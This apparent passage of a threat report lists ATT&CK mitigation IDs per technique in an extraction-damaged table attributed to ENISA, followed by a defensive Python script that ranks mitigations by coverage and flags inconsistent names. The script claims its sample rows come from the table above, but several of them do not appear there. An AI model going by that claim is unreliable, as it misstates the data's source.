M1051: Update Software, M1018: User Account Management, M1017: User Training, M1021: Restrict Web-Based Content, M1027: Password Policies, M1026: Privileged Account Management
M1038: Execution Prevention, M1024: Restrict Registry Permissions, M1018: User Account Management, M1022: Restrict File and Directory Permissions, M1047: Audit, M1054: Software Configuration, M1042: Disable or Remove Feature or Program
T1562.004: Disable or Modify System Firewall
M1015: Active Directory Configuration, M1043: Credential Access Protection, M1041: Encrypt Sensitive Information, M1027: Password Policies, M1047: Audit, M1026: Privileged Account Management
M1054: Software Configuration, M1018: User Account Management, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions, M1047: Audit, M1042: Disable or Remove Feature or Program
M1038: Execution Prevention, M1024: Restrict Registry Permissions, M1018: User Account Management, M1022: Restrict File and Directory Permissions, M1047: Audit, M1054: Software Configuration, M1042: Disable or Remove Feature or Program
M1047: Audit, M1018: User Account Management, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions, M1054: Software Configuration, M1038: Execution Prevention, M1042: Disable or Remove Feature or Program
T1564.001: Hidden Files and Directories
Mitigation Management, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions, M1047: Audit, M1042: Disable or Remove Feature or Program
M1033: Limit Software Installation, M1013: Application Developer Guidance, M1047: Audit, M1049: Antivirus/Antimalware
M1033: Limit Software Installation, M1013: Application Developer Guidance, M1047: Audit, M1049: Antivirus/Antimalware
M1038: Execution Prevention, M1033: Limit Software Installation, M1013: Application Developer Guidance, M1047: Audit, M1049: Antivirus/Antimalware
M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1021: Restrict Web-Based Content, M1049: Antivirus/Antimalware, M1017: User Training
T1566.001: Spearphishing Attachment
M1047: Audit, M1018: User Account Management, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions, M1054: Software Configuration, M1038: Execution Prevention, M1042: Disable or Remove Feature or Program
M1026: Privileged Account Management, M1054: Software Configuration, M1018: User Account Management, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions, M1047: Audit, M1042: Disable or Remove Feature or Program
M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1021: Restrict Web-Based Content, M1049: Antivirus/Antimalware, M1017: User Training
M1049: Antivirus/Antimalware, M1018: User Account Management, M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1017: User Training, M1021: Restrict Web-Based Content
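The rows above list, per observed technique, the ATT&CK mitigation IDs ENISA maps to it; in practice a defender wants to know which mitigations recur across the most techniques (broadest coverage per control) and whether any ID carries inconsistent names that point to extraction damage. The following script is an added example, not code from the ENISA report or from MITRE; it assumes the flattened row format shown above (comma-separated `Mxxxx: Name` pairs, one row per technique) and uses a constructed subset of those rows as its input.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: a few of the flattened mitigation rows from the table
# above, copied as extracted (including the truncated "M1052: User Account"
# and the hyphen-damaged "Outof-Band" / "WebBased" names).  Each row stands
# for one technique's mitigation set, since the technique column is missing.
SAMPLE_ROWS = [
    "M1041: Encrypt Sensitive Information, M1051: Update Software, M1017: User Training, M1026: Privileged Account Management",
    "M1038: Execution Prevention, M1028: Operating System Configuration, M1051: Update Software, M1052: User Account",
    "M1038: Execution Prevention, M1028: Operating System Configuration, M1051: Update Software, M1052: User Account Control, M1026: Privileged Account Management",
    "M1030: Network Segmentation, M1060: Outof-Band Communications Channel, M1024: Restrict Registry Permissions",
    "M1047: Audit, M1021: Restrict WebBased Content, M1049: Antivirus/Antimalware, M1017: User Training",
]

# One ATT&CK mitigation ID followed by its name, up to the next comma.
MITIGATION_RE = re.compile(r"\b(M\d{4}):\s*([^,]+)")


def parse_row(row):
    """Return the (id, name) pairs found in one flattened row, in order."""
    return [(m.group(1), m.group(2).strip()) for m in MITIGATION_RE.finditer(row)]


def normalise_name(name):
    """Repair the extraction damage seen in the table: lost hyphens, extra spaces."""
    name = re.sub(r"\s+", " ", name)
    return name.replace("Outof-Band", "Out-of-Band").replace("WebBased", "Web-Based")


def find_name_conflicts(rows):
    """Map each ID to every name it appears with.

    An ID that shows up with more than one name is almost always a truncated
    or garbled row (e.g. 'User Account' vs 'User Account Control'), so the
    conflicting IDs are returned for manual review.
    """
    names = defaultdict(set)
    for row in rows:
        for mid, name in parse_row(row):
            names[mid].add(normalise_name(name))
    return {mid: sorted(n) for mid, n in names.items() if len(n) > 1}


def rank_mitigations(rows):
    """Count how many technique rows each mitigation appears in.

    Duplicates within a single row are counted once, so the number is the
    count of techniques a control addresses, not the number of mentions.
    """
    counts = Counter()
    for row in rows:
        counts.update({mid for mid, _ in parse_row(row)})
    return counts.most_common()


if __name__ == "__main__":
    for mid, variants in find_name_conflicts(SAMPLE_ROWS).items():
        print(f"inconsistent name for {mid}: {variants}")
    for mid, n in rank_mitigations(SAMPLE_ROWS):
        print(f"{mid} covers {n} technique row(s)")
```

On the sample rows, the conflict check flags only M1052 (truncated in one row), and M1051: Update Software ranks first because it appears in three of the five rows; run against the full table, the same ranking is a quick way to order remediation work by how many observed techniques each control touches.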